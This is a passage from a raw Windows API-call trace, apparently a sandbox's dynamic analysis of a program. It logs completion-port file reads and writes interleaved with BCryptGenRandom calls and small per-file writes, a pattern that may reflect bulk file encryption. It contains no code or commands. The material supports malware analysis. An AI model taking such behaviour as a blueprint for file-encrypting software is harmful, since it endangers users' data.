lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.716] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.716] free (_Block=0x3e305b8) [0173.716] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.716] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.716] free (_Block=0x1fa91d0) [0173.716] free (_Block=0x1fa2ed8) [0173.716] free (_Block=0x1fa90b8) [0173.716] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.725] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1900, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.725] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.733] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7ca4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.739] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.746] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xf60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.746] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.894] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x6cd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.894] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.904] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.904] free (_Block=0x3e305b8) [0173.904] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.904] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.904] free (_Block=0x1fa91d0) [0173.904] free (_Block=0x1fa2ed8) [0173.904] free (_Block=0x1fa90b8) [0173.904] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.904] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.910] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.910] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.910] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.911] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.911] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.911] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.911] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.911] free (_Block=0x3e305b8) [0173.911] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.911] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.911] free (_Block=0x1fa91d0) [0173.911] free (_Block=0x1fa2ed8) [0173.911] free (_Block=0x1fa90b8) [0173.911] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.912] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.915] CloseHandle (hObject=0x170) returned 1 [0173.916] free (_Block=0x3d70450) [0173.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.923] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.923] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.923] free (_Block=0x3e305b8) [0173.923] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.923] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.923] free (_Block=0x1fa91d0) [0173.923] free (_Block=0x1fa2ed8) [0173.923] free (_Block=0x1fa90b8) [0173.923] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0173.923] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.948] CloseHandle (hObject=0x308) returned 1 [0173.948] free (_Block=0x3e70008) [0173.948] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0173.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0173.955] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.955] free (_Block=0x3e305b8) [0173.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.955] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.955] free (_Block=0x1fa91d0) [0173.955] free (_Block=0x1fa2ed8) [0173.955] free (_Block=0x1fa90b8) [0173.955] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.956] WriteFile (in: hFile=0x2a4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x35c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.957] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0173.960] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0173.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.842] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8f0e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.857] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.873] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x514c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0174.887] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.909] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x2090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0174.909] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.911] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0174.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0174.912] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.912] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.913] free (_Block=0x3e305b8) [0174.913] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.913] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0174.913] free (_Block=0x1fa91d0) [0174.913] free (_Block=0x77d7a8) [0174.913] free (_Block=0x1fa90b8) [0174.913] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0174.913] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.914] CloseHandle (hObject=0x3cc) returned 1 [0174.916] free (_Block=0x3f70048) [0174.916] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.918] CloseHandle (hObject=0x2a4) returned 1 [0174.919] free (_Block=0x3d70450) [0174.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.933] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0174.933] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0174.934] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0174.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0174.934] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0174.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0174.934] free (_Block=0x3e305b8) [0174.934] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0174.934] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0174.935] free (_Block=0x1fa91d0) [0174.935] free (_Block=0x1fa2ed8) [0174.935] free (_Block=0x1fa90b8) [0174.935] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.935] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0174.940] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0174.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.221] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xbbe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.221] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.235] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.235] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.235] free (_Block=0x3e305b8) [0175.235] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.235] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.235] free (_Block=0x1fa91d0) [0175.236] free (_Block=0x1fa2ed8) [0175.236] free (_Block=0x1fa90b8) [0175.236] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0175.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.249] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.249] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.249] free (_Block=0x3e305b8) [0175.249] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.249] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.249] free (_Block=0x1fa91d0) [0175.249] free (_Block=0x1fa2ed8) [0175.249] free (_Block=0x1fa90b8) [0175.249] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.264] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.264] free (_Block=0x3e305b8) [0175.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.264] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.264] free (_Block=0x1fa91d0) [0175.264] free (_Block=0x1fa2ed8) [0175.264] free (_Block=0x1fa90b8) [0175.264] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0175.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.279] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.279] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0175.279] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.279] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.279] free (_Block=0x3e305b8) [0175.279] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.280] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.280] free (_Block=0x1fa91d0) [0175.280] free (_Block=0x1fa2ed8) [0175.280] free (_Block=0x1fa90b8) [0175.280] WriteFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0175.280] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0175.293] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.293] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.293] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: 